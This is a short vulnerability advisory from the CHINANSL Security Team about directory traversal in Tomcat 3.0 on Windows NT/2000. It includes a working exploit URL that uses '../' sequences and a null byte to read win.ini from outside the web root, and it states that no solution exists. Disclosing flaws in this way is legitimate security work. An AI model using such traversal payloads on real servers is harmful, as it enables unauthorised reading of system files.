Topic:
Tomcat 3.0 for win2000 Directory traversal
Vulnerability
vulnerable:
Tomcat 3.0 for win2000
maybe for other operating system also.
discussion:
A security vulnerability has been found in Windows
NT/2000 systems that have Tomcat 3.0 installed.The
vulnerability allows remote attackers to access files
outside the document root directory scope.
exploits:
http://target:8080/../../winnt/win.ini%
00examples/jsp/hello.jsp
It is possible to cause the Tomcat server to send
back the content of win.ini.
solution:
None
Copyright 2000-2001 CHINANSL. All Rights
Reserved. Terms of use.
CHINANSL Security Team
<[EMAIL PROTECTED]>
CHINANSL INFORMATION TECHNOLOGY CO.,LTD
(http://www.chinansl.com)
